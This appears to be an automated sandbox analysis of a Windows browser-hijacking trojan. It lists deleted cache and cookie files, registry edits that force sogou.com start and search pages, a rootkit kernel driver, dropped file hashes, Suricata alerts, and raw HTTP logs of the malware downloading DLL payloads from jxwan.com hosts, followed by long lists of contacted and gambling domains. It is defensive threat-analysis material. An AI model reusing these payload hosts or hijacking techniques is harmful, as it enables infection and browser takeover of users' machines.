C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\DA70B9EE949D3ADCBE10033750AB47FFEA045E3E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-forbid-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-unwanted-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2031416DA0EBB4347FFB723FC4B4C3289383F1C7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\F0687D4CB965F097204F417DFBDC74BC5950135F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\698AC159A6BCBA0D13FE6F10F1A38E498F826F33 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\1C849477DE15B1F8F2245945F3F44468F58146DF (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\339A4E96E26DFFA4704F0AF081D2B85B12D03939 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9C2602C28BD668BB4AE4681731BA564B00BDA3E4 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\AJQLWW1A.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8035BC2ABB17F717B57A550CC9E2EF7580417F69 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\165A82B735DDDE6F05E29A770A52297EAE982902 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\VqEnvKPzCrM8a4pakUu0bzh7d9o[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SN1VAMHK.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\YJCP8HIK.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_1 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\98F3CC667C872833F2A93C841A531CD308BB708E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2F56B586A819A62543E0EBD916F11DAAD2CCD424 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\BFEBBC0ACB3B39D75483B76F4E7AEC3C2D363FF5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0F161541D0AEA6CD932E2BF6FB045B97389F9A5A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\A3D4372536C2A6CA26ECB4389B6AE73E3BED83A7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\doomed\3412 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\A5VV6NGJ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozplugin-block-digest256.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\1I56O6EZ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\7E882DAC0955721D3A046FDC6431463C3E3D0655 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\directoryLinks.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\HGQPYGV7.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B8A48CBFE22CD43A122B2A63C67009F5CC043432 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KE9BMB37.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\9UFT3VMU.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-phish-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\svg[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\5902F6289661A11B83C4457A92FA159F59FE812E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\startupCache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\59A2A51D07303AA6BDB591966C4388DFB3BB359E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B73E4A4438B9B71F020E7D4B54AE283770E47CA7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\OfflineCache\index.sqlite (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\079225D0110CA684572A47D7287538AEB72DE9DD (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C9C0AB304A24D626A01D04F597B8F4DA1C0BB353 (0 bytes)

Registry activity

The process f23bb1c179d6ccab543d15af98e5eea.exe:260 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\services\VtXt6rrWyWL]
"Start" = "3"

[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"ShortcutBehavior" = "1"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "https://123.sogou.com/?71102-0043"
"Local Page" = "https://123.sogou.com/?71102-0043"

[HKLM\System\CurrentControlSet\services\VtXt6rrWyWL]
"Devname" = "VtXt6rrWyWLÆ¢"
"ImagePath" = "\DosDevices\C:\Windows\system32\14532e\CDClient_EX.sys"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"URL" = "https://www.sogou.com/sie?hdq=Af71102-0043&query={searchTerms}&ie=utf8"

[HKLM\System\CurrentControlSet\services\VtXt6rrWyWL]
"ErrorControl" = "1"
"Type" = "1"

[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"PopupsUseNewWindow" = "1"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Enable Browser Extensions" = "no"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Internet Explorer\TypedURLs]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions]

Dropped PE files

MD5 File path
51138beea3e2c21ec44d0932c71762a8 c:\ProgramData\pDcYLpIG\f23bb1c179d6ccab543d15af98e5eea.exe
51138beea3e2c21ec44d0932c71762a8 c:\Users\All Users\pDcYLpIG\f23bb1c179d6ccab543d15af98e5eea.exe
89d67caa050c7cdcd0d25617570c5100 c:\Windows\wrhKvXr\lMmgfUJPh.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "\DosDevices\C:\Windows\system32\14532e\82JCnUAayG1.sys" the Trojan controls creation and closing of processes by installing the process notifier.
Using the driver "entry 1 from table of Process notifiers, error 59" the Trojan controls creation and closing of processes by installing the process notifier.
Using the driver "\DosDevices\C:\Windows\system32\14532e\82JCnUAayG1.sys" the Trojan controls loading executable images into a memory by installing the Load image notifier.
Using the driver "\DosDevices\C:\Windows\system32\14532e\82JCnUAayG1.sys" the Trojan controls operations with a system registry by installing the registry notifier.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
CODE 4096 299008 116736 5.54409 7447ec20e915aefa001b3ec035460570
DATA 303104 24576 14336 5.51482 6423434f61fc873a2fff37a155462ead
BSS 327680 4096 0 0 d41d8cd98f00b204e9800998ecf8427e
.idata 331776 8192 2048 5.43092 b28b70ae8671a878ee755fe2a593517c
.tls 339968 4096 0 0 d41d8cd98f00b204e9800998ecf8427e
.rdata 344064 4096 512 0.143426 f2d16d514515f63a6ca5e54aa0f78065
.reloc 348160 24576 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 372736 16384 4608 5.08114 ce288fb53f0de086ebc788aba75545b0
.aspack 389120 8192 5632 4.13993 cb7160f308503f22361b3085c4c34e69
.adata 397312 4096 0 0 d41d8cd98f00b204e9800998ecf8427e

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://udo.jxwan.com/index/getcfg?id=50043 119.97.143.59
hxxp://5636.ecoma.ourwebpic.com/d2/CDClient.dll
hxxp://5636.ecoma.ourwebpic.com/d2/x86.dll
hxxp://5636.ecoma.ourwebpic.com/
hxxp://1212.ip138.com/ic.asp 183.238.101.232
hxxp://dld.jxwan.com/d2/x86.dll 87.245.198.83
hxxp://dld.jxwan.com/d2/CDClient.dll 87.245.198.83
hxxp://www.ip138.com/ 87.245.198.83
dns.msftncsi.com 131.107.255.255


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

GET /index/getcfg?id=50043 HTTP/1.1
Host: udo.jxwan.com
Accept: text/html, */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)


HTTP/1.1 200
Server: nginx/1.8.1
Date: Wed, 24 May 2017 21:32:32 GMT
Transfer-Encoding: chunked
Connection: keep-alive

<<< skipped >>>

GET / HTTP/1.1
Host: VVV.ip138.com
Accept: text/html, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)


HTTP/1.1 200 OK
Date: Wed, 24 May 2017 10:18:42 GMT
Content-Length: 20806
Content-Type: text/html
Content-Location: hXXp://VVV.ip138.com/index.htm
Last-Modified: Tue, 23 May 2017 02:56:22 GMT
Accept-Ranges: bytes
ETag: "6af182970d3d21:16065"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Age: 40452
X-Via: 1.1 db77:5 (Cdn Cache Server V2.0)
Connection: keep-alive

<<< skipped >>>

GET /ic.asp HTTP/1.1
Host: 1212.ip138.com
Accept: text/html, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)


HTTP/1.1 200 OK
Date: Wed, 24 May 2017 21:38:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 219
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQTTARBQ=IMKGFGECIMAHLDMJLNFLHPFC; path=/
Cache-control: private
<html>..<head>..<meta http-equiv="content-type" content
="text/html; charset=gb2312">..<title> ....IP.... </title&
gt;..</head>..<body style="margin:0px"><center>....I
P....[194.242.96.218] ............</center></body></htm
l>..


HEAD /d2/x86.dll HTTP/1.1
Host: dld.jxwan.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Wed, 24 May 2017 21:17:38 GMT
Server: kangle/2.9.6
Last-Modified: Mon, 26 Dec 2016 03:09:39 GMT
Content-Type: application/octet-stream
Content-Length: 126464
Age: 1
X-Via: 1.1 db77:3 (Cdn Cache Server V2.0)
Connection: keep-alive
....



GET /d2/x86.dll HTTP/1.1
Host: dld.jxwan.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Wed, 24 May 2017 21:17:38 GMT
Server: kangle/2.9.6
Last-Modified: Mon, 26 Dec 2016 03:09:39 GMT
Content-Type: application/octet-stream
Content-Length: 126464
Age: 1
X-Via: 1.1 db77:3 (Cdn Cache Server V2.0)
Connection: keep-alive

<<< skipped >>>

HEAD /d2/CDClient.dll HTTP/1.1
Host: dld.jxwan.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Wed, 24 May 2017 09:39:55 GMT
Server: kangle/2.9.6
Last-Modified: Wed, 24 May 2017 04:06:16 GMT
Content-Type: application/octet-stream
Content-Length: 957440
Age: 1
X-Via: 1.1 db77:3 (Cdn Cache Server V2.0)
Connection: keep-alive
....



GET /d2/CDClient.dll HTTP/1.1
Host: dld.jxwan.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Wed, 24 May 2017 09:39:55 GMT
Server: kangle/2.9.6
Last-Modified: Wed, 24 May 2017 04:06:16 GMT
Content-Type: application/octet-stream
Content-Length: 957440
Age: 1
X-Via: 1.1 db77:3 (Cdn Cache Server V2.0)
Connection: keep-alive

<<< skipped >>>

The Trojan connects to the servers at the following location(s):

VVV.hao522.com
hao522.com
icafedh.com
baibu.com
ieadd.adkuai8.com
index.jj123.com.cn
index.hao2016.net
hao.169x.cn
169x.cn
VVV.qidiannet.cn
ok.32wb.com
wbspdh.wicp.net
netbar.6-6.cn
42.62.30.180
dwz.cn
VVV.9973.com
9973.com
61.160.250.4
VVV.msn.com
msn.com
VVV.baiduso.com
baiduso.com
index.114wb.net
cdc.114wb.net
114wb.net
123.yhkj9.com
index.58toto.com
ieadd.uc916.com
uc916.com
VVV.apyw.net
VVV.aiwbnet.net
VVV.yaojyw.net
VVV.gt18z.com
union.17lot.com
17lot.com
VVV.v6669.cn
index.icafevip.com
www1.7899987.com
7899987.com
0.baidu.com
VVV.52daohang.com
52daohang.com
index.56wanyx.win
56wanyx.win
VVV.369k.net
227237.com
desk.nmenu.cn
nmenu.cn
yuanyang.d9media.cn
VVV.826826.com
web.sogou.com
123.161gg.com
go.microsoft.com
VVV.114la.com
114.huo99.com
m.browser.baidu.com
index.51wanyx.net
51wanyx.net
index.52icafe.com
52icafe.com
VVV.19so.cn
bmywm.com
interface.wx-media.com
wx-media.com
index.iwb110.com
iwb110.com
17huohu.com
i.17huohu.com
i.firefoxchina.cn
cn.hao123.com
VVV.so26.com
VVV.560560.com
www1.baidu.com
VVV.wz58.com
2345n.sogoulp.com
index.icafe66.com
VVV.jlshoping.com
VVV.hnshoping.com
cn.msn.com
VVV.bmywm.com
sogoulp.com
hao.5in8.com
VVV.5334.com
123.k6kb.xyz
.91wanyx.lol
VVV.hlybar.com
.114wb.net
wbsite2016.net
.hao522.com
VVV.icafedh.com
.hao2016.net
daohang2016.com
pownet.net
42.62.30.180/
dwz.cn/OXHad
d9media.cn
web.sogou.com/?
VVV.hao123.com/?tn=
cn.hao123.com/?tn=
VVV.baidu.com/?tn=
VVV.baidu.com/index.php?tn=
VVV.baidu.com/home?dsp=netbar&tn=
VVV.sogou.com/index.htm?pid=sogou-netb-d
VVV.bmywm.com/sg
hao.360.cn/?
123.sogou.com/?71066-
123.sogou.com/?71084-
123.sogou.com/?71013
123.sogou.com/?71021
123.sogou.com/?71032
VVV.sogou.com/index.htm?pid=sogou-netb-c
VVV.pc918.net
index.woai310.com
VVV.sogou58.com
VVV.tao123.com
VVV.dh18.com
huo99.com
hao123.cdsoso.net
VVV.2345.com/?
VVV.soso.com/?unc=
VVV.soso.com/wbhp.shtml?unc=
VVV.soso.com/wbhp.shtml?cid=union.s.wh&unc=q
VVV.youdao.com/n3/?keyfrom=netb.yiyong&vendor=netb.yiyong_
VVV.sogou.com/index.htm?pid=sogou-netb-1
VVV.sogou.com/index.htm?pid=sogou-netb-3
VVV.sogou.com/index.htm?pid=sogou-netb-4
VVV.sogou.com/index.htm?pid=sogou-netb-6
VVV.sogou.com/index.htm?pid=sogou-netb-7
VVV.sogou.com/index.htm?pid=sogou-netb-8
VVV.sogou.com/index.htm?pid=sogou-netb-9
VVV.sogou.com/index.htm?pid=sogou-netb-2e7c
VVV.sogou.com/index.htm?pid=sogou-netb-b
VVV.sogou.com/index.htm?pid=sogou-netb-c20
VVV.hao123.com/?tn=96012662_hao_pg
VVV.hao123.com/?tn=96994152_hao_pg
123.sogou.com/?71063-5
VVV.hao123.com/?tn=99123885_hao_pg
VVV.hao123.com/?tn=94287050_hao_pg
VVV.hao123.com/?tn=92823465_hao_pg
VVV.hao123.com/?tn=93908426_hao_pg
VVV.hao123.com/?tn=90567778_hao_pg
hao123.com/?tn=91163052_hao_pg
123.sogou.com/?71069-1004
VVV.baidu.com/s?tn=32
HKEY_LOCAL_MACHINE,SYSTEM\CurrentControlSet\Services\dnsset
HKEY_LOCAL_MACHINE,SYSTEM\CurrentControlSet\Services\ZWebNds
HKEY_LOCAL_MACHINE,SYSTEM\CurrentControlSet\Services\stans
doutray.pdb;
llpro.dll;SeBrowser.dll;IeBrowserEx.dll;Hintf1d.dll;$F09DA8BE96,$61C38F9711;$12CBBF0EC73,$6D2E1BEF02;$D667E38E84,$429A944374;$F5CE5DEB07,$6603847B05;shadowbrowser.dll;shadowbrowser64.dll;
setprox.dll;$D8F1CE9F45,$5DBDA6FB19;$F029D22D98,$499AB4745D;$D6D16940E7,$55E55977AD;$DE1B21F3F3,$57BA15CAD0;$FE19F91D36,$4F9F651426;$D54D673CEE,$5930917415;$13D20CC5FF9,$5BBC98C340;$D23E39E252,$5873AF0F6A;$F6A81C182C,$44B775E5D5;$DB8F7C8E06,$5136D67B4D;
$E3A98697D3,$64B9525505;$EC6AA2F429,$61290336F9;$DBE0A719CB,$55C7A99C24;xyIeBrowserEx64.dll;xyIeBrowserEx.dll;$DEA30A04DE,$532AE2575E;$11CA43E231A,$3553DF44D;setprox64.dll;iebrowserex64.dll;$F8B2783F67,$5CD420FAE9;$D8F1CE9F45,$5DBDA6FB19;
ClassHelper64.dll;$107394245FE,$8196FE5AFD;$E9C88C8864,$557C2A0D84;$DF40EAEC61,$51EEBA0A04;$D954616772,$5885AAFC81;$DB6878D997,$6020424E3E;$2004B09DA,$18EE2EABA3;$D900AAC5C1,$56B846C6F5;$13D20CC5FF9,$5BBC98C340;$D23E39E252,$5873AF0F6A;
$E686C4CB83,$549B9881F3;$123076BB9E5,$63C11BA1B9;$110128099F3,$47CEEE3B04;$ED1DE61550,$51285D60D1;$10CCA5BA968,$52A7D11BA1;$E09B8D30CB,$4F6A65C1A5;$128E8727207,$666DC972F4;redl.dll;$E346DC856A,$51C7617796;$E26F9AF66F,$5E96B00269;$F2FBFA2B33,$537CD26F98;
2345WebProtect
$55101FA7,$87F5D674;$552FC0D0,$881804CC;$5556ECD7,$883CD655;shadowbrowser.dll;$5580C11B,$885AC5D7;$55A316C0,$88818963;$55ACB9D3,$86E18FD2;$557FC656,$86DAA61B;$55B9E5C2,$889F9DBF;$549A873A,$87359EC7;$55D2FC4F,$88B83B70;
$563365F0,$88ECECC3;$549A873A,$87359EC7;$563043CB,$878CA073;$56211FC3,$88DAB657;$55E743A6,$89287619;$5618E898,$88A81031;xyIeBrowserEx.dll;$555C32F1,$88007C70;ProcessHelperWin32.dll;setprox.dll;$55F05A6E,$88D1483C;$55EF9678,$887DED79;
$566E2971,$822ADD8D;$566BB5C9,$88FD25B0;$5649564F,$82030AC8;$52D7749C,$8410FC0A;$5635F79B,$8778CD3B;$55CC53DF,$871EA0C8;$54059963,$854B07CC;$565273FA,$820C7A6B;$56175BED,$88AA686F;$563C1A47,$8778D1F1;$544A1AA4,$86BE90CD;nbie.dll;
$56A9AEEE,$8277D728;$556FD8F3,$884989E3;$572B3DE5,$89FC6E36;$573406D5,$830D9B8B;$572D881E,$8307AA7B;$572B17B6,$886F34AF;$570F9E92,$89DA4694;redl.dll;$570CA22E,$884C5DEB;$5710B2E1,$82EA4A8E;$55EFD26E,$8A31E327;$563B2855,$88F53B9C;$55E743A6,$89287619;
levram.dll;$585A4114,$844FF124;$5848ECB9,$843D7CB8;$583C013B,$897F3672;$583553A9,$8989C64F;$00000000,$313E0221;$582435BA,$8417E647;$57FB091F,$8A9C56E2;$57EB753C,$83DDE427;$57CE2D72,$8A7954CB;$57E1041F,$83D44996;$57D278E8,$83AF7D19;$57CBD35C,$83A8239C;
iehelper.dll;msdmo.nls;$2A425E19,$E532110D;$2A425E19,$E533CBAE;$2A425E19,$E5341A95;$2A425E19,$E5352366;$5281D8C1,$8505E31E;$526A2B67,$84F2FF48;$53E5E35B,$856EB8A4;
IEOPTimize.dll;swaddresbar.dll;swntrace.dll;c_2987.nls;ilovehint2.dll;orient.dll;ilovehint.dll;
snqu_proxy_X64.pdb;BACK.pdb;
MainProX.exe*5C9389C539DDEAFFA58BF110B8ED8F03
wxpro.dll
Busiwork.dll
swaddresbar.dll
loguser.dll
WxVSafe.dll
lolhelper.dll
wxcore.dll
rmserver.exe
exploren.exe
services.exe
lexplore.exe
fbrowser.exe
qqbrowse.exe
360chrom.exe
TaBrowse.exe
Explore.exe
taskmgr.exe
tasklis.exe
Service.exe
NOTEPAD.EXE
control.exe
conhost.exe
clipbrd.exe
command.com
comhost.exe
comtrol.exe
taskmur.exe
Explone.exe
Servlce.exe
contool.exe
connost.exe
fbrowse.exe
Browser.exe
Firefox.exe
lsans.exe
cacis.exe
clsvc.exe
netst.exe
xuean.exe
Brows.exe
Sogou.exe
lleba.exe
ADMon.exe
Chrom.exe
csrss.exe
baidubrowser.exe
2345Explorer.exe
liebao.exe
Maxthon.exe
TheWorld.exe
TaoBrowser.exe
7chrome.exe
FastIE.exe
350chrome.exe
ttraveler.exe
MiniIE.EXE
VVV.hao123.com
VVV.baidu.com
mpxlks.net
b9988111.com
VVV.66440.com
VVV.66441.com
VVV.06543.com
VVV.82468.com
axlinyi.com
139vvv.com
s2668.com
s3668.com
s1399.com
s5456.com
s0456.com
s6799.com
s7166.com
00003801.com
0006163.com
0008109.com
002002m.com
0032138.com
006yth.com
010716.com
0112828.com
0151.cm
027sfst.com
029zhuangshi.com
0316ga.com
0329c.com
0471am.com
050ab29.com
0512bgy.com
0750fan.com
0756sys.com
1006163.com
1115866.com
111f11.com
111scweb.com
11663801.com
119.145.148.100
123cc222.com
123cc333.com
123cc444.com
123hiwei.com
168111777.com
172.247.41.24
173.255.138.123
18dj18.com
1bet999.com
1hgp.com
1p111.com
20070022.com
20071199.com
2007901.com
2055aaa.com
2130.qg790.com
2221402.com
248vip.com
2500fp.com
25175704.com
2770003.com
28365365.com
28456.cc
29salon.com
2p222.com
3040168.com
3067k.com
307858.com
3308z.com
3344bh.com
33aa402.com
36466a.com
3648918.com
365bet.mobi
3670239.com
3939053.com
3939071.com
3q511.com
4006118588.com
4050789.com
405475.cc
4213333.cc
4444kk.com
45.61.250.46
47.89.30.97
478vip.com
5060001.com
517888.cc
517888.net
51taotaoyou.com
51ujk.com
520hghg.com
53030055.com
5345yy.com
55502504.com
555050.com
5555.ht
5556163.com
55gg163.com
57jsc.com
58757.com
59bo.cc
59bo.com
6.kle5.com
600.cc
6060128.com
6163yyy.com
617888.cc
63777b.com
63bdg.com
6585226.com
66.133.87.55
6677.us
66bcdf.com
66pp66.com
6767385.com
6x6js.com
700624.com
7108ee.com
727330.com
741580.cc
76055a.com
79bo.com
80651.com
81581501.com
81808188.com
84805.net
85850z.com
860923.top
86666.8994.com
87dianping.com
8800y9.com
882828.cc
882828.net
885858.cc
886868.net
88jt03.com
88jt09.com
88jt33.net
88jt66.com
88jt88.com
88pjdc.com
8e789.com
9000402.com
935msc.com
94bo.net
959900009.com
95990011.net
95990044.cc
95990777.net
9599110.com
9599112.com
9599221.com
9599223.com
95992828.cc
95992828.net
9599333.com
95993333.cc
95993838.cc
95993838.net
9599550.com
95995511.net
95995566.net
95995858.cc
9599664.com
95996666.net
95996868.cc
95996868.com
95997878.cc
95998888.cc
9599889.net
9599aaa.com
9599hh.net
9599mm.net
9599qq.com
95jyb8.com
95zz00.com
95zz08.com
95zz11.com
95zz44.com
95zz88.com
9663553.com
9882011.com
99029k.com
9910z.com
9911tyc.com
991991.cc
9927qqq.com
99333666.com
9955sbd.com
9988sj.com
999202.com
99966524.com
99zz222.com
a52022.com
aaa01234.com
aaa555050.com
ad.050122.com
ad.148021.com
ad.517dapai.com
ag711.cc
aibo68.com
amjs58.com
amws1199.com
anyaoying.com
aobo00.com
aobo8.net
aoya113.com
aoyayule.com
arsenal.com.cn
asiabet11.com
avzylu.com
ay159.com
aygj587.com
aygj77.com
b1888.cc
b2888.cc
b365444.com
b9888.cc
bb565.net
bbbcmp8.com
bdg251.com
ben5588.com
ben7777.com
bet007.com
betping.net
betvictor61.com
bf.90ko.net
bifa1357.com
bifa7777.com
binfencai.com
biz5.sandai.net
bjmyql.com
blm0000.com
blr0088.com
bmw.39960005.com
bmw55.com
bmw999555.com
bmw999888.com
boan83.com
bocaijing.com
bogou888.com
bs0055.com
bwin0055.com
bwin2003.com
bwin2020.com
bxz2017.com
ca7766.com
cate.syd.com.cn
cc0033.com
cczhb.com
chinabreed.com
chunv55.com
clever-china.com
club366.net
cmp8d.com
cqgj0.com
cqwywudao.com
csqclt.com
csywzc.com
daben08.com
dafa888.asia
dafa888.cm
dafa888.com
dafa91.cn
dafabet.com
danbao002.com
dazhengjiaoyu.com
dc1108.com
dd0044.com
ddh111.com
df011.com
dh2665.com
dh5524.com
dhy0022.com
dhy8855.com
dlzywzj.com
dqxswzxd.com
ds61888.cn
dxstudy.com
dy7777.com
dy8811.com
echina365.com
emai60.com
f402.com
fa74955.com
fa97463.com
feibo4.com
feibodr111.com
ff366.net
game88city.com
gaxinshili.com
gcgc915.com
gdhzxd.com
gds678.com
gdzfcn.com
gf9922.com
glyn88.com
gtlivegaming.com
guo400.com
gzsanli.com
h88eg.com
hailifang.com
hainei.org
hanquantz.com
hao555666.com
haomatang.com
happybannerfarm.com
hb3333.com
hb9599.com
hd182.net
hd9599.com
hellocareer.net
heshangmeng.net
hf6222.com
hg0088.com.so
hg0088.net
hg2288.oi
hg5987.com
hg9801122.com
hga8800.com
hgbet222.com
hgw025.com
hgw1109.com
hgw9983.com
hjzs888.com
hqshuaimi.com
hudabo07.com
hvwin99.com
hystsn.com
ifeng888896.com
jaymacawards.com
ji586987.com
jichenco.com
jin3388.com
jin5088.com
jinleyigou.com
jinniu30.com
jinniu40.com
jiuwuzhizun00.net
jiuwuzhizun11.cc
jiuwuzhizun11.com
jiuwuzhizun6.cc
jiuwuzhizun6.com
jjxieqiaoxx.com
jkg1.cc
jkgdq.com
jkgqm.com
jkgqs.com
jkgqt.com
jkhhq.com
jn12345.com
js00697.com
js15.cndatian.com
js9980.com
jsc9988.com
jucai234.com
justoa79.com
jvnongbao.com
jwzzgw.cc
jwzzgw2.com
jwzzgw4.cc
jwzzgw6.cc
jwzzgw6.com
jxdfsh.com
jxftech.com
jxnanhu.com
jyd900.com
k178.vcevv.cn
k5911.com
kaqiduoyoule.net
kingdynasty.cn
kkkk0166.com
live.sobifen.com
live.titan007.com
lkj9875.com
long772.com
long8.cc
lvyinba.com
lxyl32.com
m88help.net
mg000.com
mg1555.com
milan86.com
mmtx77.com
mmxx55.com
moca777.com
mry3311.com
mtmkite.com
my63303.com
n0178.com
naixiu33.com
nbboard.com
newbet6.com
ningbofojiaowang.com
niuhubo8.com
nswzsd.com
ob1818.vip
olog648.top
pay6524.com
pj3516.com
pp88086.com
px0311.com
qiangui666.com
qiangui678.com
qingree.com.cn
qpl777.com
qwe654.com
VVV.qn889.com
qy0707.com
qy8100.com
rm726.com
rr678uu.co
s88ab.com
s8s.cc
sandu.la
sanrasoft.com
sbd777.com
score.365rich.cn
sdrdwh.com
sf135.net
sg.bjh20.com
shangshangchuanmei.com
sheser.com
shgw123.com
simple-elec.com
sqzl99.com
szbcfs.net
szjiuyou.com
t5252.com
taohuajiang.net
taotietem.com
tbbet8888.com
tbet88.com
tbfastfast888.com
tlc187.com
tongbo8888.com
ty1299.com
